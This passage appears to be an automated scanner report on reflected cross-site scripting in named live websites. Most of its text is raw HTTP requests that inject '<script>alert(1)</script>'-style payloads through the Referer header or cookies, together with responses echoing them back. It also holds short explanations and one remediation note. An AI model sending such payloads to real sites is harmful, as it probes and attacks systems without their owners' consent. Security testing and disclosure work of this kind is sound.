HTTP/1.1 404 Page not found Set-Cookie: ARPT=MJOJUMS192.168.2.146CKMWQ; path=/ Connection: close Date: Mon, 31 Jan 2011 19:48:02 GMT Server: Microsoft-IIS/6.0 X-HMIO-Server: HBIWeb1 X-Powered-By: ASP.NET Set-Cookie: CFID=970727;expires=Wed, 23-Jan-2041 19:48:02 GMT;path=/ Set-Cookie: CFTOKEN=97334119;expires=Wed, 23-Jan-2041 19:48:02 GMT;path=/ Set-Cookie: JSESSIONID=56309fd6b1301d2c6639;path=/ Content-Language: en-GB Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.d ...[SNIP]... "DM5606269AEF84EN3";//ACCOUNT NUMBER(S) hbx.pn="404";//PAGE NAME(S) hbx.mlc="HSU/MESSAGES/404/HTTP://WWW.HAYMARKETBUSINESSSUBS.COM:80/SUBSCRIPTIONS/?::REFERER::HTTP://WWW.GOOGLE.COM/SEARCH?HL=EN&Q=C06C0"-ALERT(1)-"9B7CACD62D8";//MULTI-LEVEL CONTENT CATEGORY hbx.pndef="index.cfm";//DEFAULT PAGE NAME hbx.ctdef="full";//DEFAULT CONTENT CATEGORY
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c833"-alert(1)-"31f58088b84 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp HTTP/1.1 Host: www.tradingmarkets.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=1c833"-alert(1)-"31f58088b84
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 20:07:45 GMT Server: Apache Set-Cookie: TestCookie=test Cache-Control: max-age=1 Expires: Mon, 31 Jan 2011 20:07:46 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23269
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Online Stock Trading Investing Day Trading | TradingMarkets.com </t ...[SNIP]... page=http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp&from=http://www.google.com/search?hl=en&q=1c833"-alert(1)-"31f58088b84"); } catch(err) {} </script> ...[SNIP]...
The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload dbc0e<script>alert(1)</script>82c7a78d6e was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087570&AR_C=40401740 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.22;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a/L46/1678441172/Top1/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_728.html/726348573830307044726341416f7670?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/RadioShack/SELL_2011Q1/RTG/728/L36/772729617/x90/USNetwork/RS_SELL_2011Q1_247_RTG_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=772729617? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; ar_p68511049=exp=1&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 16:31:23 2011&prad=264243128&arc=186035359&; BMX_3PC=1dbc0e<script>alert(1)</script>82c7a78d6e; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296491490%2E045%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:09:08 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=40&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Jan 31 17:09:08 2011&prad=58087570&arc=40401740&; expires=Sun 01-May-2011 17:09:08 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26752
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087570",Pid:"p85001580",Arc:"40401740",Location:CO ...[SNIP]... 2Cwait%2D%3E10000%2C', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p85001580": 'exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&', "BMX_3PC": '1dbc0e<script>alert(1)</script>82c7a78d6e', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5 ...[SNIP]...
The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 899db<script>alert(1)</script>28541a05e7e was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087570&AR_C=40401740 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.22;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a/L46/1678441172/Top1/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_728.html/726348573830307044726341416f7670?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/RadioShack/SELL_2011Q1/RTG/728/L36/772729617/x90/USNetwork/RS_SELL_2011Q1_247_RTG_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=772729617? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; ar_p68511049=exp=1&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 16:31:23 2011&prad=264243128&arc=186035359&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296491490%2E045%2Cwait%2D%3E10000%2C899db<script>alert(1)</script>28541a05e7e
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:09:08 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=40&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Jan 31 17:09:08 2011&prad=58087570&arc=40401740&; expires=Sun 01-May-2011 17:09:08 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26753
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087570",Pid:"p85001580",Arc:"40401740",Location:CO ...[SNIP]... 580": 'exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&', "BMX_3PC": '1', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1296491490%2E045%2Cwait%2D%3E10000%2C899db<script>alert(1)</script>28541a05e7e', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5 ...[SNIP]...
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 511e0<script>alert(1)</script>f44b0675936 was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p68511049&PRAd=264243128&AR_C=186035359 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://redcated/MRT/iview/264243128/direct;wi.640;hi.480/01?ENN_rnd=12964914777625&click=http://www.ectnews.com/adsys/link/%3Fcreative%3d7040%26ENN_rnd%3d12964914777625%26ENN_target= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; UID=1d29d89e-72.246.30.75-1294456810511e0<script>alert(1)</script>f44b0675936
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:09:07 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p68511049=exp=1&initExp=Mon Jan 31 17:09:07 2011&recExp=Mon Jan 31 17:09:07 2011&prad=264243128&arc=186035359&; expires=Sun 01-May-2011 17:09:07 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296493747; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 25118
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264243128",Pid:"p68511049",Arc:"186035359",Location: ...[SNIP]... ); }else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload); }}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "UID": '1d29d89e-72.246.30.75-1294456810511e0<script>alert(1)</script>f44b0675936', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan ...[SNIP]...
The value of the ar_p45555483 cookie is copied into the HTML document as plain text between tags. The payload 105b8<script>alert(1)</script>9f76ef43bcd was submitted in the ar_p45555483 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p68511049&PRAd=264243128&AR_C=186035359 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://redcated/MRT/iview/264243128/direct;wi.640;hi.480/01?ENN_rnd=12964914777625&click=http://www.ectnews.com/adsys/link/%3Fcreative%3d7040%26ENN_rnd%3d12964914777625%26ENN_target= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&105b8<script>alert(1)</script>9f76ef43bcd; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:09:06 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p68511049=exp=1&initExp=Mon Jan 31 17:09:06 2011&recExp=Mon Jan 31 17:09:06 2011&prad=264243128&arc=186035359&; expires=Sun 01-May-2011 17:09:06 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296493746; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 25118
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264243128",Pid:"p68511049",Arc:"186035359",Location: ...[SNIP]... d Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&105b8<script>alert(1)</script>9f76ef43bcd', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "http://photobucket.co ...[SNIP]...
The value of the ar_p67161473 cookie is copied into the HTML document as plain text between tags. The payload f143e<script>alert(1)</script>94af48f4fd5 was submitted in the ar_p67161473 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p68511049&PRAd=264243128&AR_C=186035359 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://redcated/MRT/iview/264243128/direct;wi.640;hi.480/01?ENN_rnd=12964914777625&click=http://www.ectnews.com/adsys/link/%3Fcreative%3d7040%26ENN_rnd%3d12964914777625%26ENN_target= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&f143e<script>alert(1)</script>94af48f4fd5; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:09:05 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p68511049=exp=1&initExp=Mon Jan 31 17:09:05 2011&recExp=Mon Jan 31 17:09:05 2011&prad=264243128&arc=186035359&; expires=Sun 01-May-2011 17:09:05 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296493745; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 25118
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264243128",Pid:"p68511049",Arc:"186035359",Location: ...[SNIP]... ();}COMSCORE.BMX.Broker.Cookies={ "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&f143e<script>alert(1)</script>94af48f4fd5', "ar_p85001580": 'exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01: ...[SNIP]...
The value of the ar_p68511049 cookie is copied into the HTML document as plain text between tags. The payload d7fe7<script>alert(1)</script>4b32758c781 was submitted in the ar_p68511049 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087570&AR_C=40401740 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.22;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a/L46/1678441172/Top1/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_728.html/726348573830307044726341416f7670?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/RadioShack/SELL_2011Q1/RTG/728/L36/772729617/x90/USNetwork/RS_SELL_2011Q1_247_RTG_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=772729617? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; ar_p68511049=exp=1&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 16:31:23 2011&prad=264243128&arc=186035359&d7fe7<script>alert(1)</script>4b32758c781; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296491490%2E045%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:09:07 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=40&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Jan 31 17:09:07 2011&prad=58087570&arc=40401740&; expires=Sun 01-May-2011 17:09:07 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26753
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087570",Pid:"p85001580",Arc:"40401740",Location:CO ...[SNIP]... Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p68511049": 'exp=1&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 16:31:23 2011&prad=264243128&arc=186035359&d7fe7<script>alert(1)</script>4b32758c781' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http ...[SNIP]...
The value of the ar_p83612734 cookie is copied into the HTML document as plain text between tags. The payload 673c2<script>alert(1)</script>9d2284eef49 was submitted in the ar_p83612734 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p68511049&PRAd=264243128&AR_C=186035359 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://redcated/MRT/iview/264243128/direct;wi.640;hi.480/01?ENN_rnd=12964914777625&click=http://www.ectnews.com/adsys/link/%3Fcreative%3d7040%26ENN_rnd%3d12964914777625%26ENN_target= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&673c2<script>alert(1)</script>9d2284eef49; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:09:06 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p68511049=exp=1&initExp=Mon Jan 31 17:09:06 2011&recExp=Mon Jan 31 17:09:06 2011&prad=264243128&arc=186035359&; expires=Sun 01-May-2011 17:09:06 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296493746; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 25118
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264243128",Pid:"p68511049",Arc:"186035359",Location: ...[SNIP]... t Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&673c2<script>alert(1)</script>9d2284eef49' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http ...[SNIP]...
The value of the ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload 8b57b<script>alert(1)</script>41db85d668d was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
